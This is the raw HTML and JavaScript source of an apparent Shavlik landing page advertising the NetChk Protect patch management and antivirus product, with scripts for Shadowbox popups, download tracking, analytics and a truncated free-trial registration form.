sUrl = 'thank.cfm?bnetchk=' + sNET + '&bcaseStudy=' + sCASE + '&bwebinar=' + sWEB;

Shadowbox.open({
content: sUrl,
player: "iframe",
width: 500,
height: 400
});



}

return retValue;
}



</script>













































































































































































































<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
<title>Security software - Free trial Shavlik automated patch mgmt + antivirus</title>


<link rel="stylesheet" href="style/style5.css" type="text/css" media="all" />
<!--[if IE 6]>
<style>
#navitem a {padding-bottom:0px;}
</style>
<![endif]-->
<script language="javascript" type="text/javascript">
function windowOpen(sURL, bFade, sWindowName) {

if (bFade) {
document.getElementById("body").style.backgroundColor = "gray";
}

sWindowName = sWindowName || "newWindow";

nPosX = (window.screen.width/2) - (400);
nPosY = (window.screen.height/2) - (350 + 75);

newWindow = window.open(sURL,sWindowName,"status=0,toolbar=0,scrollbars=1,width=800,height=600,screenX=" + nPosX + ",screenY=" + nPosY);

newWindow.focus();

}


var req;

function docLoad(url) {
req = false;
// non IE
if(window.XMLHttpRequest && !(window.ActiveXObject)) {
try {
req = new XMLHttpRequest();
} catch(e) {
req = false;
}
// IE
} else if(window.ActiveXObject) {
try {
req = new ActiveXObject("Msxml2.XMLHTTP");
} catch(e) {
try {
req = new ActiveXObject("Microsoft.XMLHTTP");
} catch(e) {
req = false;
}
}
}

if(req) {
//req.onreadystatechange = processReqChange;
req.open("GET", url, false);
req.send("");

}

//req = false;

}

function downloadRecord(fileID)
{

sURL = "download.cfm?nFileID=" + fileID + "&a=1";
docLoad(sURL);

}


</script>
<link rel="stylesheet" type="text/css" href="shadowbox/shadowbox.css">
<script type="text/javascript" src="shadowbox/shadowbox.js"></script>
<script type="text/javascript">

function userCheck(sURL,nID) {

docLoad('userCheck.cfm');

if (req.responseText == 'num0') {

Shadowbox.open({
content: 'download.cfm?nFileID=0&a=1',
player: "iframe"
});

return true;

}

else if (sURL.search('.wmv') != -1) {

Shadowbox.open({
content: sURL,
player: "html",
width: 700,
height: 570

});

downloadRecord(nID);

return true;

}

else {

Shadowbox.open({
content: sURL,
player: "flv",
width: 640,
height: 364

});

downloadRecord(nID);

return true;
}

}

Shadowbox.init({
modal: true

});

</script>

<script type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-22410401-11']);
_gaq.push(['_trackPageview']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js';
var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s);
})();

</script>


</head>








































































































































































































































































<body> <div id="wrapper"> <div style="background-image:url('images/SHAV_topBar.jpg'); background-repeat:no-repeat; height:30px;"></div> <div id="container"> <div id="logo"> <a href="index.cfm?pg=374" target="_blank"><img src="images/SHAV_INT_downloadForm_btn.jpg" style="border:none; float:right; margin-right:20px;"></a> </div> <div id="topContainer"> <img src="images/Shav_LP_serious_safe.png" style="margin:-25px 0 -20px 65px; position:absolute;">

<div id="content">
<h1 style="font-size:40px; margin-top:0;">Comprehensive security software that can make life easier</h1>
<img src="images/SHAV_LP_patch_logo.png">

<p class="contentCopy">
<strong>NetChk®</strong> Protect is the comprehensive agentless patch management system designed to meet today’s most pressing IT challenges. NetChk® Protect simplifies the complexity of IT management by automating patching – for both your operating system and for third-party applications – so you’re protected from every angle.
<br /><br />
In less than 30 minutes, <strong>NetChk®</strong> Protect will be up and running, detecting and deploying missing patches.
<br /><br />
<strong>NetChk®</strong> Protect also includes the Sunbelt VIPRE Enterprise Antivirus + Antispyware + Antimalware engine to integrate world-class antivirus protection with comprehensive patch management for faster, more cost-effective network security.
</p>
</div>
<div style="background-image:url('images/SHAV_blackLine.jpg'); background-repeat:no-repeat; height:19px;"></div> </div> <div id="bottomContainer"><!--- bottomContainer ---> <div id="leftBottom">
<a href="index.cfm?pg=704" style="text-decoration:none;"><h2>SimplexITy Bundle Savings of 80% <img src="images/Shav_LP_serious_arrow.png" style="border:0;"></h2></a>

<h3 style="font-style:italic;">For a limited time, the more Shavlik IT Management products you use, the more you save.</h3>
<p class="bottomCopy">NetChk® Protect is part of the Shavlik SimplexITy Bundle, the ultimate IT management solution for network professionals. Combining our best-in-class network security and IT management applications, the bundle is the comprehensive answer to your patch management, antivirus, power management, and configuration challenges.</p>

<h3 style="font-style:italic;">Explore the Shavlik SimplexITy Bundle:</h3>

<p class="bottomCopy">Click on the links below for detailed information on each functionality that can simplify your IT workload:</p>

<ul class="bottomCopy" style="margin-left:15px; padding:0; line-height:26px;">
<li><a href="index.cfm?pg=697" class="current">Automated Patch Management</a></li>
<li><a href="index.cfm?pg=698">Next-generation Enterprise Antivirus</a></li>
<li><a href="index.cfm?pg=701">Centralized Power Management</a></li>
<li><a href="index.cfm?pg=699">Simplified Configuration and Compliance</a></li>
</ul>
</div> <div id="middleBottom">
<p class="bottomCopy" style="margin-top:0;">For a fraction of the money you spend for antivirus protection today, you can simplify the complexity of IT management and have complete protection against your top security threats.</p>

<img src="images/Shav_LP_serious_piggyBank.jpg" style="padding-top:10px;">
</div> <!--- formDIV ---> <div id="rightBottom"> <tr> <td> <form name="DownloadInfo" method="post" action="http://www.shavlik.com/pDownloadForm4.aspx" id="DownloadInfo" style="text-align: center;" target="regFrame"> <p id="formHeader">Download a FREE Trial Today</p>

<p class="bottomCopy" style="margin-bottom:0;">Register today to try Shavlik’s NetChk® Protect patch management - or save even more by upgrading to the SimplexITy bundle! <span style="font-style:italic; font-size:11px;">* Denotes Required Fields</span></p>

<div style="display:none;">
<input type="checkbox" name="caseStudy" id="caseStudy" value="1">

<input type="checkbox" name="webinar" id="webinar" value="1">

<input type="checkbox" name="netchk" id="netchk" value="1" checked>
</div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" v..